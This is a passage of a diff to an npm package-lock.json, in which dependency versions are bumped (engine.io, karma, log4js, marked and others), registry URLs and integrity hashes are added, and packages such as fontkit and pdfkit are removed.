"sha512-Hk61vXXKRb2cd3znPE9F+2pLWdIOmP7GjiTj45y6L3W/lO+hSnUSUhq+6lEaERWBdZOHbk2s3YV5c9xVl3boVw==" }, "emoji-regex": { "version": "7.0.3", @@ -22577,20 +23514,27 @@ } }, "engine.io": { - "version": "4.1.1", + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.1.2.tgz", + "integrity": "sha512-v/7eGHxPvO2AWsksyx2PUsQvBafuvqs0jJJQ0FdmJG1b9qIvgSbqDRGwNhfk2XHaTTbTXiC4quRE8Q9nRjsrQQ==", "dev": true, "requires": { + "@types/cookie": "^0.4.1", + "@types/cors": "^2.8.12", + "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "2.0.0", "cookie": "~0.4.1", "cors": "~2.8.5", "debug": "~4.3.1", - "engine.io-parser": "~4.0.0", - "ws": "~7.4.2" + "engine.io-parser": "~5.0.0", + "ws": "~8.2.3" }, "dependencies": { "debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -22598,20 +23542,26 @@ }, "ms": { "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true }, "ws": { - "version": "7.4.6", + "version": "8.2.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.2.3.tgz", + "integrity": "sha512-wBuoj1BDpC6ZQ1B7DWQBYVLphPWkm8i9Y0/3YdHjHKHiohOJ1ws+3OccDWtH+PoC9DZD5WOTrJvNbWvjS6JWaA==", "dev": true, "requires": {} } } }, "engine.io-parser": { - "version": "4.0.3", + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.0.3.tgz", + "integrity": "sha512-BtQxwF27XUNnSafQLvDi0dQ8s3i6VgzSoQMJacpIcGNrlUdfHSKbgm3jmjCVvQluGzqwujQMPAoMai3oYSTurg==", "dev": true, "requires": { - "base64-arraybuffer": "0.1.4" + "@socket.io/base64-arraybuffer": "~1.0.2" } }, "enhanced-resolve": { @@ -22698,10 +23648,6 @@ "has-tostringtag": "^1.0.0" } }, - "object-inspect": { - "version": "1.11.0", - "dev": true - }, "string.prototype.trimend": { "version": "1.0.4", "dev": true, @@ -22735,6 +23681,8 @@ }, "es5-ext": { "version": "0.10.53", + "resolved": "https://registry.npmjs.org/es5-ext/-/es5-ext-0.10.53.tgz", + "integrity": "sha512-Xs2Stw6NiNHWypzRTY1MtaG/uJlwCk8kH81920ma8mvN8Xq1gsfhZvpkImLQArw8AHnv8MT2I45J3c0R8slE+Q==", "dev": true, "requires": { "es6-iterator": "~2.0.3", @@ -22744,6 +23692,8 @@ }, "es6-iterator": { "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-iterator/-/es6-iterator-2.0.3.tgz", + "integrity": "sha1-p96IkUGgWpSwhUQDstCg+/qY87c=", "dev": true, "requires": { "d": "1", @@ -22753,6 +23703,8 @@ }, "es6-map": { "version": "0.1.5", + "resolved": "https://registry.npmjs.org/es6-map/-/es6-map-0.1.5.tgz", + "integrity": "sha1-kTbgUD3MBqMBaQ8LsU/042TpSfA=", "dev": true, "requires": { "d": "1", @@ -22776,6 +23728,8 @@ }, "es6-set": { "version": "0.1.5", + "resolved": "https://registry.npmjs.org/es6-set/-/es6-set-0.1.5.tgz", + "integrity": "sha1-0rPsXU2ADO2BjbU40ol02wpzzLE=", "dev": true, "requires": { "d": "1", @@ -22787,6 +23741,8 @@ "dependencies": { "es6-symbol": { "version": "3.1.1", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.1.tgz", + "integrity": "sha1-vwDvT9q2uhtG7Le2KbTH7VcVzHc=", "dev": true, "requires": { "d": "1", @@ -22797,6 +23753,8 @@ }, "es6-symbol": { "version": "3.1.3", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.3.tgz", + "integrity": "sha512-NJ6Yn3FuDinBaBRWl/q5X/s4koRHBrgKAu+yGI6JCBeiu3qrcbJhwT2GeR/EXVfylRk8dpQVJoLEFhK+Mu31NA==", "dev": true, "requires": { "d": "^1.0.1", @@ -22845,20 +23803,44 @@ "version": "1.0.5" }, "escodegen": { - "version": "1.14.3", + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.2.0.tgz", + "integrity": "sha1-Cd55Z3kcyVi3+Jot220jRRrzJ+E=", "dev": true, "requires": { - "esprima": "^4.0.1", - "estraverse": "^4.2.0", - "esutils": "^2.0.2", - "optionator": "^0.8.1", - "source-map": "~0.6.1" + "esprima": "~1.0.4", + "estraverse": "~1.5.0", + "esutils": "~1.0.0", + "source-map": "~0.1.30" }, "dependencies": { + "esprima": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-1.0.4.tgz", + "integrity": "sha1-n1V+CPw7TSbs6d00+Pv0drYlha0=", + "dev": true + }, + "estraverse": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-1.5.1.tgz", + "integrity": "sha1-hno+jlip+EYYr7bC3bzZFrfLr3E=", + "dev": true + }, + "esutils": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-1.0.0.tgz", + "integrity": "sha1-gVHTWOIMisx/t0XnRywAJf5JZXA=", + "dev": true + }, "source-map": { - "version": "0.6.1", + "version": "0.1.43", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.1.43.tgz", + "integrity": "sha1-wkvBRspRfBRx9drL4lcbK3+eM0Y=", "dev": true, - "optional": true + "optional": true, + "requires": { + "amdefine": ">=0.0.4" + } } } }, @@ -22893,6 +23875,8 @@ }, "estree-is-function": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/estree-is-function/-/estree-is-function-1.0.0.tgz", + "integrity": "sha512-nSCWn1jkSq2QAtkaVLJZY2ezwcFO161HVc174zL1KPW3RJ+O6C3eJb8Nx7OXzvhoEv+nLgSR1g71oWUHUDTrJA==", "dev": true }, "estree-walker": { @@ -22908,6 +23892,8 @@ }, "event-emitter": { "version": "0.3.5", + "resolved": "https://registry.npmjs.org/event-emitter/-/event-emitter-0.3.5.tgz", + "integrity": "sha1-34xp7vFkeSPHFXuc6DhAYQsCzDk=", "dev": true, "requires": { "d": "1", @@ -22916,6 +23902,8 @@ }, "event-stream": { "version": "4.0.1", + "resolved": "https://registry.npmjs.org/event-stream/-/event-stream-4.0.1.tgz", + "integrity": "sha512-qACXdu/9VHPBzcyhdOWR5/IahhGMf0roTeZJfzz077GwylcDd90yOHLouhmv7GJ5XzPi6ekaQWd8AvPP2nOvpA==", "dev": true, "requires": { "duplexer": "^0.1.1", @@ -23111,14 +24099,18 @@ } }, "ext": { - "version": "1.4.0", + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/ext/-/ext-1.6.0.tgz", + "integrity": "sha512-sdBImtzkq2HpkdRLtlLWDa6w4DX22ijZLKx8BMPUuKe1c5lbN6xwQDQCxSfxBQnHZ13ls/FH0MQZx/q/gr6FQg==", "dev": true, "requires": { - "type": "^2.0.0" + "type": "^2.5.0" }, "dependencies": { "type": { - "version": "2.5.0", + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/type/-/type-2.6.0.tgz", + "integrity": "sha512-eiDBDOmkih5pMbo9OqsqPRGMljLodLcwd5XD5JbtNB0o89xZAwynY9EdCDsJU7LtcVCClu9DvM7/0Ep1hYX3EQ==", "dev": true } } @@ -23194,15 +24186,16 @@ "version": "3.1.3" }, "fast-glob": { - "version": "3.2.5", + "version": "3.2.11", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.2.11.tgz", + "integrity": "sha512-xrO3+1bxSo3ZVHAnqzyuewYT6aMFHRAd4Kcs92MAonjwQZLsK9d0SF1IyQ3k5PoirxTW0Oe/RqFgMQ6TcNE5Ew==", "dev": true, "requires": { "@nodelib/fs.stat": "^2.0.2", "@nodelib/fs.walk": "^1.2.3", - "glob-parent": "^5.1.0", + "glob-parent": "^5.1.2", "merge2": "^1.3.0", - "micromatch": "^4.0.2", - "picomatch": "^2.2.1" + "micromatch": "^4.0.4" } }, "fast-json-stable-stringify": { @@ -23210,6 +24203,8 @@ }, "fast-levenshtein": { "version": "2.0.6", + "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", "dev": true }, "fastparse": { @@ -23240,6 +24235,13 @@ "file-saver": { "version": "2.0.5" }, + "file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==", + "dev": true, + "optional": true + }, "fill-range": { "version": "7.0.1", "requires": { @@ -23293,7 +24295,9 @@ "dev": true }, "flatted": { - "version": "2.0.2", + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.5.tgz", + "integrity": "sha512-WIWGi2L3DyTUvUrwRKgGi9TwxQMUEqPOPQBVi71R96jZXJdFskXEmf54BoZaS1kknGODoIGASGEzBUYdyMCBJg==", "dev": true }, "flatten": { @@ -23301,40 +24305,11 @@ "dev": true }, "follow-redirects": { - "version": "1.13.0", + "version": "1.14.9", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.9.tgz", + "integrity": "sha512-MQDfihBQYMcyy5dhRDJUHcw7lb2Pv/TuE6xP1vyraLukNDHKbDxDNaOE3NbCAdKQApno+GPRyo1YAp89yCjK4w==", "dev": true }, - "fontkit": { - "version": "1.8.1", - "dev": true, - "requires": { - "babel-runtime": "^6.26.0", - "brfs": "^2.0.0", - "brotli": "^1.2.0", - "browserify-optional": "^1.0.1", - "clone": "^1.0.4", - "deep-equal": "^1.0.0", - "dfa": "^1.2.0", - "restructure": "^0.5.3", - "tiny-inflate": "^1.0.2", - "unicode-properties": "^1.2.2", - "unicode-trie": "^0.3.0" - }, - "dependencies": { - "pako": { - "version": "0.2.9", - "dev": true - }, - "unicode-trie": { - "version": "0.3.1", - "dev": true, - "requires": { - "pako": "^0.2.5", - "tiny-inflate": "^1.0.0" - } - } - } - }, "for-in": { "version": "1.0.2", "dev": true @@ -23365,8 +24340,21 @@ }, "from": { "version": "0.1.7", + "resolved": "https://registry.npmjs.org/from/-/from-0.1.7.tgz", + "integrity": "sha1-g8YK/Fi5xWmXAH7Rp2izqzA6RP4=", "dev": true }, + "fs-extra": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", + "dev": true, + "requires": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + } + }, "fs-minipass": { "version": "2.1.0", "dev": true, @@ -23381,6 +24369,17 @@ "fs.realpath": { "version": "1.0.0" }, + "fsevents": { + "version": "1.2.13", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-1.2.13.tgz", + "integrity": "sha512-oWb1Z6mkHIskLzEJ/XWX0srkpkTQ7vaopMQkyaEIoq0fmtFVxOthb8cCxeT+p3ynTdkk/RZwbgG4brR5BeWECw==", + "dev": true, + "optional": true, + "requires": { + "bindings": "^1.5.0", + "nan": "^2.12.1" + } + }, "function-bind": { "version": "1.1.1" }, @@ -23421,6 +24420,8 @@ }, "get-assigned-identifiers": { "version": "1.2.0", + "resolved": "https://registry.npmjs.org/get-assigned-identifiers/-/get-assigned-identifiers-1.2.0.tgz", + "integrity": "sha512-mBBwmeGTrxEMO4pMaaf/uUEFHnYtwr8FTe8Y/mer4rcV/bye0qGm6pw1bGZFGStxC5O76c5ZAVBGnqHmOaJpdQ==", "dev": true }, "get-caller-file": { @@ -23666,17 +24667,29 @@ } }, "http-auth": { - "version": "4.1.7", + "version": "4.1.9", + "resolved": "https://registry.npmjs.org/http-auth/-/http-auth-4.1.9.tgz", + "integrity": "sha512-kvPYxNGc9EKGTXvOMnTBQw2RZfuiSihK/mLw/a4pbtRueTE45S55Lw/3k5CktIf7Ak0veMKEIteDj4YkNmCzmQ==", "dev": true, "requires": { "apache-crypt": "^1.1.2", "apache-md5": "^1.0.6", "bcryptjs": "^2.4.3", - "uuid": "^3.4.0" + "uuid": "^8.3.2" + }, + "dependencies": { + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true + } } }, "http-auth-connect": { "version": "1.0.5", + "resolved": "https://registry.npmjs.org/http-auth-connect/-/http-auth-connect-1.0.5.tgz", + "integrity": "sha512-zykAOKpVAXyzhOLm6+xyB/RtRcfN3uDfH4Al73DIfeSb6B7nr0WToLI6UyyM6ohtcLmbBPksWXzVbEDStz8ObQ==", "dev": true }, "http-cache-semantics": { @@ -23883,19 +24896,12 @@ } }, "i18next": { - "version": "20.4.0", + "version": "21.6.11", + "resolved": "https://registry.npmjs.org/i18next/-/i18next-21.6.11.tgz", + "integrity": "sha512-tJ2+o0lVO+fhi8bPkCpBAeY1SgkqmQm5NzgPWCQssBrywJw98/o+Kombhty5nxQOpHtvMmsxcOopczUiH6bJxQ==", "dev": true, "requires": { "@babel/runtime": "^7.12.0" - }, - "dependencies": { - "@babel/runtime": { - "version": "7.15.3", - "dev": true, - "requires": { - "regenerator-runtime": "^0.13.4" - } - } } }, "iconv-lite": { @@ -24523,7 +25529,9 @@ "dev": true }, "json-schema": { - "version": "0.2.3" + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1" @@ -24536,7 +25544,9 @@ "dev": true }, "json5": { - "version": "2.1.3", + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.0.tgz", + "integrity": "sha512-f+8cldu7X/y7RAJurMEJmdoKXGB/X550w2Nr3tTbezL6RwEE/iMcm+tZnXeoZtKuOq6ft8+CqzEkrIgx1fPoQA==", "requires": { "minimist": "^1.2.5" } @@ -24548,10 +25558,13 @@ "dev": true }, "jsonfile": { - "version": "4.0.0", + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", "dev": true, "requires": { - "graceful-fs": "^4.1.6" + "graceful-fs": "^4.1.6", + "universalify": "^2.0.0" } }, "jsonparse": { @@ -24559,11 +25572,13 @@ "dev": true }, "jsprim": { - "version": "1.4.1", + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", - "json-schema": "0.2.3", + "json-schema": "0.4.0", "verror": "1.10.0" } }, @@ -24578,13 +25593,15 @@ } }, "karma": { - "version": "6.3.4", + "version": "6.3.16", + "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.16.tgz", + "integrity": "sha512-nEU50jLvDe5yvXqkEJRf8IuvddUkOY2x5Xc4WXHz6dxINgGDrgD2uqQWeVrJs4hbfNaotn+HQ1LZJ4yOXrL7xQ==", "dev": true, "requires": { "body-parser": "^1.19.0", "braces": "^3.0.2", "chokidar": "^3.5.1", - "colors": "^1.4.0", + "colors": "1.4.0", "connect": "^3.7.0", "di": "^0.0.1", "dom-serialize": "^2.2.1", @@ -24593,16 +25610,17 @@ "http-proxy": "^1.18.1", "isbinaryfile": "^4.0.8", "lodash": "^4.17.21", - "log4js": "^6.3.0", + "log4js": "^6.4.1", "mime": "^2.5.2", "minimatch": "^3.0.4", + "mkdirp": "^0.5.5", "qjobs": "^1.2.0", "range-parser": "^1.2.1", "rimraf": "^3.0.2", - "socket.io": "^3.1.0", + "socket.io": "^4.2.0", "source-map": "^0.6.1", "tmp": "^0.2.1", - "ua-parser-js": "^0.7.28", + "ua-parser-js": "^0.7.30", "yargs": "^16.1.1" }, "dependencies": { @@ -24774,6 +25792,8 @@ }, "levn": { "version": "0.3.0", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.3.0.tgz", + "integrity": "sha1-OwmSTt+fCDwEkP3UwLxEIeBHZO4=", "dev": true, "requires": { "prelude-ls": "~1.1.2", @@ -24799,33 +25819,6 @@ "version": "2.0.3", "dev": true }, - "linebreak": { - "version": "1.0.2", - "dev": true, - "requires": { - "base64-js": "0.0.8", - "brfs": "^2.0.2", - "unicode-trie": "^1.0.0" - }, - "dependencies": { - "base64-js": { - "version": "0.0.8", - "dev": true - }, - "pako": { - "version": "0.2.9", - "dev": true - }, - "unicode-trie": { - "version": "1.0.0", - "dev": true, - "requires": { - "pako": "^0.2.5", - "tiny-inflate": "^1.0.0" - } - } - } - }, "lines-and-columns": { "version": "1.1.6", "dev": true @@ -24913,18 +25906,22 @@ } }, "log4js": { - "version": "6.3.0", + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.4.1.tgz", + "integrity": "sha512-iUiYnXqAmNKiIZ1XSAitQ4TmNs8CdZYTAWINARF3LjnsLN8tY5m0vRwd6uuWj/yNY0YHxeZodnbmxKFUOM2rMg==", "dev": true, "requires": { - "date-format": "^3.0.0", - "debug": "^4.1.1", - "flatted": "^2.0.1", - "rfdc": "^1.1.4", - "streamroller": "^2.2.4" + "date-format": "^4.0.3", + "debug": "^4.3.3", + "flatted": "^3.2.4", + "rfdc": "^1.3.0", + "streamroller": "^3.0.2" }, "dependencies": { "debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -24932,12 +25929,16 @@ }, "ms": { "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true } } }, "loglevel": { - "version": "1.7.1", + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/loglevel/-/loglevel-1.8.0.tgz", + "integrity": "sha512-G6A/nJLRgWOuuwdNuA6koovfEV1YpqqAG4pRUlFaz3jj2QNZ8M4vBqnVA+HBTmU/AMNUtlOsMmSpF6NyOjztbA==", "dev": true }, "loglevel-plugin-prefix": { @@ -25042,6 +26043,8 @@ }, "map-stream": { "version": "0.0.7", + "resolved": "https://registry.npmjs.org/map-stream/-/map-stream-0.0.7.tgz", + "integrity": "sha1-ih8HiW2CsQkmvTdEokIACfiJdKg=", "dev": true }, "map-visit": { @@ -25052,7 +26055,9 @@ } }, "marked": { - "version": "2.1.3", + "version": "4.0.12", + "resolved": "https://registry.npmjs.org/marked/-/marked-4.0.12.tgz", + "integrity": "sha512-hgibXWrEDNBWgGiK18j/4lkS6ihTe9sxtV4Q1OQppb/0zzyPSzoFANBa5MfsG/zgsWklmNnhm0XACZOH/0HBiQ==", "dev": true }, "mdn-data": { @@ -25257,6 +26262,8 @@ }, "morgan": { "version": "1.10.0", + "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.0.tgz", + "integrity": "sha512-AbegBVI4sh6El+1gNwvD5YIck7nSA36weD7xvIxG4in80j/UoK8AEGaWnnz8v1GxonMCltmlNs5ZKbGvl9b1XQ==", "dev": true, "requires": { "basic-auth": "~2.0.1", @@ -25268,6 +26275,8 @@ "dependencies": { "depd": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", "dev": true } } @@ -25308,12 +26317,21 @@ "version": "0.0.8", "dev": true }, + "nan": { + "version": "2.15.0", + "resolved": "https://registry.npmjs.org/nan/-/nan-2.15.0.tgz", + "integrity": "sha512-8ZtvEnA2c5aYCZYd1cvgdnU6cqwixRoYg70xPLWUws5ORTa/lnw+u4amixRS/Ac5U5mQVgp9pnlSUnbNWFaWZQ==", + "dev": true, + "optional": true + }, "nanocolors": { "version": "0.1.12", "dev": true }, "nanoid": { - "version": "3.1.25", + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.1.tgz", + "integrity": "sha512-n6Vs/3KGyxPQd6uO0eH4Bv0ojGSUvuLlIHtC3Y0kEO23YRge8H9x1GCzLn28YX0H66pMkxuaeESFq4tKISKwdw==", "dev": true }, "nanomatch": { @@ -25367,6 +26385,8 @@ }, "next-tick": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/next-tick/-/next-tick-1.0.0.tgz", + "integrity": "sha1-yobR/ogoFpsBICCOPchCS524NCw=", "dev": true }, "ngx-cookie-service": { @@ -25426,7 +26446,9 @@ } }, "node-releases": { - "version": "1.1.73" + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.2.tgz", + "integrity": "sha512-XxYDdcQ6eKqp/YjI+tb2C5WM2LgjnZrfYg4vgQt49EK268b6gYCHsBLrK2qvJo4FmCtqmKezb0WZFK4fkrZNsg==" }, "nopt": { "version": "5.0.0", @@ -25569,6 +26591,8 @@ }, "object-assign": { "version": "4.1.1", + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha1-IQmtx5ZYh8/AXLvUQsrIv7s2CGM=", "dev": true }, "object-copy": { @@ -25626,7 +26650,9 @@ } }, "object-inspect": { - "version": "1.8.0", + "version": "1.12.0", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.12.0.tgz", + "integrity": "sha512-Ho2z80bVIvJloH+YzRmpZVQe87+qASmBUKZDWgx9cu+KDrX2ZDH/3tMy+gXbZETVGs2M8YdxObOh7XAtim9Y0g==", "dev": true }, "object-is": { @@ -25720,6 +26746,8 @@ }, "optionator": { "version": "0.8.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.8.3.tgz", + "integrity": "sha512-+IW9pACdk3XWmmTXG8m3upGUJst5XRGzxMRjXzAuJ1XnIFNvfhjjIuYkDvysnPQ7qzqVzLt78BCruntqRhWQbA==", "dev": true, "requires": { "deep-is": "~0.1.3", @@ -25949,6 +26977,12 @@ "version": "0.1.1", "dev": true }, + "path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==", + "dev": true + }, "path-dirname": { "version": "1.0.2", "dev": true @@ -25980,34 +27014,36 @@ }, "pause-stream": { "version": "0.0.11", + "resolved": "https://registry.npmjs.org/pause-stream/-/pause-stream-0.0.11.tgz", + "integrity": "sha1-/lo0sMvOErWqaitAPuLnO2AvFEU=", "dev": true, "requires": { "through": "~2.3" } }, - "pdfkit": { - "version": "0.12.3", + "pdfjs-dist": { + "version": "2.12.313", + "resolved": "https://registry.npmjs.org/pdfjs-dist/-/pdfjs-dist-2.12.313.tgz", + "integrity": "sha512-1x6iXO4Qnv6Eb+YFdN5JdUzt4pAkxSp3aLAYPX93eQCyg/m7QFzXVWJHJVtoW48CI8HCXju4dSkhQZwoheL5mA==", "dev": true, - "requires": { - "crypto-js": "^4.0.0", - "fontkit": "^1.8.1", - "linebreak": "^1.0.2", - "png-js": "^1.0.0" - } + "requires": {} }, "pdfmake": { - "version": "0.2.2", + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/pdfmake/-/pdfmake-0.2.4.tgz", + "integrity": "sha512-EM39waHUe/Dg1W9C3XqYbpx6tfhYyU14JHZlI1HaW0AUEY32GbkRBjDLGWo9f7z/k3ea6k1p9yyDrflnvtZS1A==", "dev": true, "requires": { "@foliojs-fork/linebreak": "^1.1.1", - "@foliojs-fork/pdfkit": "^0.12.3", + "@foliojs-fork/pdfkit": "^0.13.0", "iconv-lite": "^0.6.3", - "svg-to-pdfkit": "^0.1.8", "xmldoc": "^1.1.2" }, "dependencies": { "iconv-lite": { "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", "dev": true, "requires": { "safer-buffer": ">= 2.1.2 < 3.0.0" @@ -26066,6 +27102,8 @@ }, "png-js": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/png-js/-/png-js-1.0.0.tgz", + "integrity": "sha512-k+YsbhpA9e+EFfKjTCH3VW6aoKlyNYI6NYdTfDL4CIvFnvsuO84ttonmZE7rc+v23SLTH8XX+5w/Ak9v0xGY4g==", "dev": true }, "portfinder": { @@ -27114,6 +28152,8 @@ }, "prelude-ls": { "version": "1.1.2", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.1.2.tgz", + "integrity": "sha1-IZMqVJ9eUv/ZqCf1cOBL5iqX2lQ=", "dev": true }, "pretty-bytes": { @@ -27376,6 +28416,8 @@ }, "proxy-middleware": { "version": "0.15.0", + "resolved": "https://registry.npmjs.org/proxy-middleware/-/proxy-middleware-0.15.0.tgz", + "integrity": "sha1-o/3xvvtzD5UZZYcqwvYHTGFHelY=", "dev": true }, "prr": { @@ -27424,6 +28466,8 @@ }, "quote-stream": { "version": "1.0.2", + "resolved": "https://registry.npmjs.org/quote-stream/-/quote-stream-1.0.2.tgz", + "integrity": "sha1-hJY/jJwmuULhU/7rU6rnRlK34LI=", "dev": true, "requires": { "buffer-equal": "0.0.1", @@ -27513,13 +28557,17 @@ }, "regenerate": { "version": "1.4.2", + "resolved": "https://registry.npmjs.org/regenerate/-/regenerate-1.4.2.tgz", + "integrity": "sha512-zrceR/XhGYU/d/opr2EKO7aRHUeiBI8qjtfHqADTwZd6Szfy16la6kqD0MIUs5z5hx6AaKa+PixpPrR289+I0A==", "dev": true }, "regenerate-unicode-properties": { - "version": "8.2.0", + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/regenerate-unicode-properties/-/regenerate-unicode-properties-10.0.1.tgz", + "integrity": "sha512-vn5DU6yg6h8hP/2OkQo3K7uVILvY4iu0oI4t3HFa81UPkhGJwkRwM10JEc3upjdhHjs/k8GJY1sRBhk5sr69Bw==", "dev": true, "requires": { - "regenerate": "^1.4.0" + "regenerate": "^1.4.2" } }, "regenerator-runtime": { @@ -27554,23 +28602,29 @@ } }, "regexpu-core": { - "version": "4.7.1", + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/regexpu-core/-/regexpu-core-5.0.1.tgz", + "integrity": "sha512-CriEZlrKK9VJw/xQGJpQM5rY88BtuL8DM+AEwvcThHilbxiTAy8vq4iJnd2tqq8wLmjbGZzP7ZcKFjbGkmEFrw==", "dev": true, "requires": { - "regenerate": "^1.4.0", - "regenerate-unicode-properties": "^8.2.0", - "regjsgen": "^0.5.1", - "regjsparser": "^0.6.4", - "unicode-match-property-ecmascript": "^1.0.4", - "unicode-match-property-value-ecmascript": "^1.2.0" + "regenerate": "^1.4.2", + "regenerate-unicode-properties": "^10.0.1", + "regjsgen": "^0.6.0", + "regjsparser": "^0.8.2", + "unicode-match-property-ecmascript": "^2.0.0", + "unicode-match-property-value-ecmascript": "^2.0.0" } }, "regjsgen": { - "version": "0.5.2", + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/regjsgen/-/regjsgen-0.6.0.tgz", + "integrity": "sha512-ozE883Uigtqj3bx7OhL1KNbCzGyW2NQZPl6Hs09WTvCuZD5sTI4JY58bkbQWa/Y9hxIsvJ3M8Nbf7j54IqeZbA==", "dev": true }, "regjsparser": { - "version": "0.6.9", + "version": "0.8.4", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.8.4.tgz", + "integrity": 